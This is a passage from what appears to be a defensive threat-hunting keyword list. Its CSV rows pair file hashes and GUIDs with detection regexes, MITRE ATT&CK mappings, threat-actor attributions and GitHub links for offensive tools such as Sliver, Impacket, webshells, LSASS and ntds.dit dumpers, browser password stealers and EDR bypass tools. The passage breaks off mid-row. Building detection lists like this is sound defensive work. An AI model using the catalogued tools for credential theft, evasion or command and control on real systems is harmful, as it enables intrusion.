"*3972dc9744f6499f0f9b2dbf76696f2ae7ad8af9b23dde66d6af86c9dfb36986*",".{0,1000}3972dc9744f6499f0f9b2dbf76696f2ae7ad8af9b23dde66d6af86c9dfb36986.{0,1000}","offensive_tool_keyword","Dispossessor","hashes of AV removing scripts tools and notes from the Dispossessor ransomware group","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","4","8","N/A","N/A","N/A","N/A","24829" 
"*3977d160d5b65edf6e6cf957b4903df9d69cd060ae9c7e1142edd307958c18b7*",".{0,1000}3977d160d5b65edf6e6cf957b4903df9d69cd060ae9c7e1142edd307958c18b7.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24830" "*3979fa127a6e7b52d76b4b92fa2fd3be3d51acfcf109da79ac51ab812cc16098*",".{0,1000}3979fa127a6e7b52d76b4b92fa2fd3be3d51acfcf109da79ac51ab812cc16098.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","24831" "*39832c87758a620ccc75fcbdacee79993652fd81597ce79f52bab3f4b9abd2a5*",".{0,1000}39832c87758a620ccc75fcbdacee79993652fd81597ce79f52bab3f4b9abd2a5.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - 
TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","24833" "*3989cbea4af22774f0fa20d10b88c7247e675be8b9ec9dae716a44cb36d50189*",".{0,1000}3989cbea4af22774f0fa20d10b88c7247e675be8b9ec9dae716a44cb36d50189.{0,1000}","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/topotam/PetitPotam","1","0","#filehash","N/A","10","10","1944","290","2024-08-15T03:52:26Z","2021-07-18T18:19:54Z","24835" "*399399f17d32ec67656ef826a7efc16e48fb10f5b59da6b2d57feca3676a8190*",".{0,1000}399399f17d32ec67656ef826a7efc16e48fb10f5b59da6b2d57feca3676a8190.{0,1000}","offensive_tool_keyword","dumper2020","Create a minidump of the LSASS process - attempts to neutralize all user-land API hooks before dumping LSASS","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gitjdm/dumper2020","1","0","#filehash","N/A","10","1","76","5","2020-12-29T03:55:21Z","2020-10-04T17:25:21Z","24837" "*3998762030e8de14ef07cd7befce737e4ab9d4fa0682621dedb56e7774a941d5*",".{0,1000}3998762030e8de14ef07cd7befce737e4ab9d4fa0682621dedb56e7774a941d5.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","24838" 
"*39a20042649a8a218ef4cb738fa9f4ab1d6396b35b741779a7e41204b828974b*",".{0,1000}39a20042649a8a218ef4cb738fa9f4ab1d6396b35b741779a7e41204b828974b.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","24839" "*39a32bbb1285b51059b5e7780f3e0b49dff4496e904641219215ea13634aa8fd*",".{0,1000}39a32bbb1285b51059b5e7780f3e0b49dff4496e904641219215ea13634aa8fd.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","24840" "*39a9dada9b6dc223cba7c4cb35efceb7cd9e40345c362c15e4c203d16f65de9f*",".{0,1000}39a9dada9b6dc223cba7c4cb35efceb7cd9e40345c362c15e4c203d16f65de9f.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","24841" 
"*39a9f25d64ef416e4be4fadf6fae1b2169bfeb02501be443e8af1fec17412f60*",".{0,1000}39a9f25d64ef416e4be4fadf6fae1b2169bfeb02501be443e8af1fec17412f60.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","#filehash","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","24842" "*39b0071c3a25122df7a0e7cc29cd450b2a8a3caded094f3ab678eba80014c33c*",".{0,1000}39b0071c3a25122df7a0e7cc29cd450b2a8a3caded094f3ab678eba80014c33c.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24844" "*39b545c7cd26258a9e45923053a5a64c9461470c3d7bfce3be1c776b287e8a95*",".{0,1000}39b545c7cd26258a9e45923053a5a64c9461470c3d7bfce3be1c776b287e8a95.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#filehash","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","24845" "*39b7a8fec13a9cee773a09c4f277a490b07fd2dd3009a7ee9092165688d7da32*",".{0,1000}39b7a8fec13a9cee773a09c4f277a490b07fd2dd3009a7ee9092165688d7da32.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24847" "*39d3fecfab8b7ea9d5a3f3dbe26b78a8d3bd6d1f191992faeaf70ca4954fdd0d*",".{0,1000}39d3fecfab8b7ea9d5a3f3dbe26b78a8d3bd6d1f191992faeaf70ca4954fdd0d.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","24848" "*39e848ddc5b27f5ff9be14dc925a8d2e3da39623fa02367a09a3f36732d55300*",".{0,1000}39e848ddc5b27f5ff9be14dc925a8d2e3da39623fa02367a09a3f36732d55300.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/XiebroC2","1","0","#filehash","N/A","10","10","1200","192","2025-02-28T09:44:43Z","2024-02-15T15:46:07Z","24850" "*39f0a8aa528f48997f9d2b81845eb9f7fbdf6151f34f883ee30da4649cc151ae*",".{0,1000}39f0a8aa528f48997f9d2b81845eb9f7fbdf6151f34f883ee30da4649cc151ae.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential 
Access","https://github.com/C-Sto/gosecretsdump","1","0","#filehash","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","24851" "*39f4e1678adb3bbbf60f3c3a394f30a0c85d17e1db7c2f10b9815c2ebc5ed314*",".{0,1000}39f4e1678adb3bbbf60f3c3a394f30a0c85d17e1db7c2f10b9815c2ebc5ed314.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","24853" "*39f6d556d0567606d5763e60fecafeb3e5d16afd986c05602c06d2486d8d72c2*",".{0,1000}39f6d556d0567606d5763e60fecafeb3e5d16afd986c05602c06d2486d8d72c2.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","24854" "*39f719f490cdea6b7566c0ad99a6c70b6d241f80328a82a403f33468a91744f2*",".{0,1000}39f719f490cdea6b7566c0ad99a6c70b6d241f80328a82a403f33468a91744f2.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","#filehash","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","24855" "*39fa3b4151fd83044106b63e95a820f4f1d769714d4f73369dba7a2187e0918b*",".{0,1000}39fa3b4151fd83044106b63e95a820f4f1d769714d4f73369dba7a2187e0918b.{0,1000}","offensive_tool_keyword","Voidgate","bypass AV/EDR memory scanners. 
This can be used to hide well-known and detected shellcodes","T1027 - T1070 - T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/undergroundwires/privacy.sexy","1","0","#filehash","N/A","9","10","4632","198","2025-04-21T21:36:39Z","2019-12-31T14:38:28Z","24856" "*39feb7b45b04c809b59430596ccf37468132d8f19e70b38dec1cc596268079d3*",".{0,1000}39feb7b45b04c809b59430596ccf37468132d8f19e70b38dec1cc596268079d3.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24857" "*3a04d62f46cebdb6a568e6a9099106314ca6398f9dedd2e5433e3a890505f62e*",".{0,1000}3a04d62f46cebdb6a568e6a9099106314ca6398f9dedd2e5433e3a890505f62e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24859" "*3a0b118ddd6b02426aba9ead93a576f7b99997cf6f07907147dd0d3294ff8887*",".{0,1000}3a0b118ddd6b02426aba9ead93a576f7b99997cf6f07907147dd0d3294ff8887.{0,1000}","offensive_tool_keyword","RottenPotatoNG","perform the RottenPotato attack and get a handle to a privileged token","T1134.001 - T1055.012 - T1547.001","TA0004","N/A","Sandworm","Privilege 
Escalation","https://github.com/breenmachine/RottenPotatoNG","1","0","#filehash","N/A","8","10","935","183","2017-12-29T14:38:47Z","2017-12-29T13:19:03Z","24861" "*3a0c5bd8c15075019d478b01768e3f81adb41a1bda738c8992d5b30903d64018*",".{0,1000}3a0c5bd8c15075019d478b01768e3f81adb41a1bda738c8992d5b30903d64018.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","24862" "*3a0c9bc22141bf413c8f2719e4266423e3d34b889f357408b4bbec60232bda66*",".{0,1000}3a0c9bc22141bf413c8f2719e4266423e3d34b889f357408b4bbec60232bda66.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","24863" "*3a1081100f285cef3c41c192d3b6d02f3bfcbc2b591be894f12ede8707b436b4*",".{0,1000}3a1081100f285cef3c41c192d3b6d02f3bfcbc2b591be894f12ede8707b436b4.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","#filehash","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","24864" 
"*3A128F79ABB162476A7677270884213C983E3F07A4850C930C8F9E7BEB38EB50*",".{0,1000}3A128F79ABB162476A7677270884213C983E3F07A4850C930C8F9E7BEB38EB50.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","24865" "*3a14a252eb81351a4b9b204b416e17ced7f2af340e2b635c149cf53bf1be2732*",".{0,1000}3a14a252eb81351a4b9b204b416e17ced7f2af340e2b635c149cf53bf1be2732.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","24868" "*3a1737f6fde0316cbc7552b8452384174908d9d124dd65016554a087455dd94e*",".{0,1000}3a1737f6fde0316cbc7552b8452384174908d9d124dd65016554a087455dd94e.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential 
Access","https://github.com/0xZDH/Omnispray","1","0","#filehash","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","24869" "*3a1f300d7497b58a8d8719e6fe6c9f7f3888e501ac601ff68712d96c0c3fa99d*",".{0,1000}3a1f300d7497b58a8d8719e6fe6c9f7f3888e501ac601ff68712d96c0c3fa99d.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","24870" "*3a2b0667b9d4537180ef1bb22133b58ddb0f6dbd9941e603277d293884c9c2c9*",".{0,1000}3a2b0667b9d4537180ef1bb22133b58ddb0f6dbd9941e603277d293884c9c2c9.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24872" "*3a2d28a6ff81e99af6bbeb0d0087866389c0177104b8e657e302c20ae4f6381c*",".{0,1000}3a2d28a6ff81e99af6bbeb0d0087866389c0177104b8e657e302c20ae4f6381c.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","24873" 
"*3A2FCB56-01A3-41B3-BDAA-B25F45784B23*",".{0,1000}3A2FCB56\-01A3\-41B3\-BDAA\-B25F45784B23.{0,1000}","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","#GUIDproject","N/A","10","10","1633","292","2024-08-30T20:30:31Z","2021-11-02T15:02:42Z","24875" "*3A2FCB56-01A3-41B3-BDAA-B25F45784B23*",".{0,1000}3A2FCB56\-01A3\-41B3\-BDAA\-B25F45784B23.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","#GUIDproject","N/A","10","3","260","48","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z","24876" "*3a368e8aad03b489b71857d21767b040a9cf0b433d1749013a9e07b133e8d136*",".{0,1000}3a368e8aad03b489b71857d21767b040a9cf0b433d1749013a9e07b133e8d136.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","24877" "*3a3b32c797443aeda45930d5b13f01d3a263ba4df42b2ed91da4a0e06e9590f7*",".{0,1000}3a3b32c797443aeda45930d5b13f01d3a263ba4df42b2ed91da4a0e06e9590f7.{0,1000}","offensive_tool_keyword","DRSAT","Disconnected RSAT is a launcher for the official Group Policy Manager - Certificate Authority and Certificate Templates snap-in to bypass the domain joined requirement that is needed when using the official MMC snap-in. 
The tool works by injecting a C# library into MMC that will hook the various API calls to trick MMC into believing that the logged on user is a domain user. attackers can abuse Disconnected RSAT to interact with Active Directory (AD) environments from non-domain-joined machines","T1559.001 - T1112 - T1078 - T1134.002 - T1055.001","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/DRSAT","1","0","#filehash","N/A","6","3","233","25","2024-12-27T11:44:18Z","2024-09-04T16:35:02Z","24880" "*3a3bd44b20afbb14ce14e70e474491383c2fcc87a554e4fbdc489c65ee7ace2a*",".{0,1000}3a3bd44b20afbb14ce14e70e474491383c2fcc87a554e4fbdc489c65ee7ace2a.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","24881" "*3a3d9e54afc72d136525dc4e70bb97d5ec2f7c1d3fe2e3afe1d9a430f68b78af*",".{0,1000}3a3d9e54afc72d136525dc4e70bb97d5ec2f7c1d3fe2e3afe1d9a430f68b78af.{0,1000}","offensive_tool_keyword","chunk-Proxy","A backdoor installed on a web server that allows for the execution of commands and facilitates persistent access.","T1505.003 - T1059 - T1105 - T1071","TA0011 - TA0002 - TA0003","Ghost Ransomware","N/A","C2","https://github.com/BeichenDream/Chunk-Proxy","1","0","#filehash","N/A","10","10","283","40","2022-05-07T04:24:50Z","2021-10-28T18:45:21Z","24882" "*3a3dabe266b3a40a834c57793083a5915c526b1bb2cf7939737aab035bc7ffeb*",".{0,1000}3a3dabe266b3a40a834c57793083a5915c526b1bb2cf7939737aab035bc7ffeb.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24883" "*3a45bdd0bae1a480040acc8ac74814d9abb904240b4c43e2fc8e730c69114fc9*",".{0,1000}3a45bdd0bae1a480040acc8ac74814d9abb904240b4c43e2fc8e730c69114fc9.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24884" "*3a503f261baea1d0cdd69d3dd8b397d7a403b8b987da910b633a1d89743842d0*",".{0,1000}3a503f261baea1d0cdd69d3dd8b397d7a403b8b987da910b633a1d89743842d0.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","24888" "*3a5252edbc3926fde111e30235830dd0cbcb8f89efab7c24864db2a5399a5c3c*",".{0,1000}3a5252edbc3926fde111e30235830dd0cbcb8f89efab7c24864db2a5399a5c3c.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","24890" "*3a572dd23436b9711f46a95f68952fda333a12e108a0a5bbded06a0e3c29c382*",".{0,1000}3a572dd23436b9711f46a95f68952fda333a12e108a0a5bbded06a0e3c29c382.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","24892" "*3a596620516109f4f6d5bfe1b2d38f53f04b60f3fff457573dd506ee981aaea3*",".{0,1000}3a596620516109f4f6d5bfe1b2d38f53f04b60f3fff457573dd506ee981aaea3.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","24893" "*3a5a1ef73fded6644e0c6b4967fb129ec3716b517b6ca8699d72e2e0fd3e49ec*",".{0,1000}3a5a1ef73fded6644e0c6b4967fb129ec3716b517b6ca8699d72e2e0fd3e49ec.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense 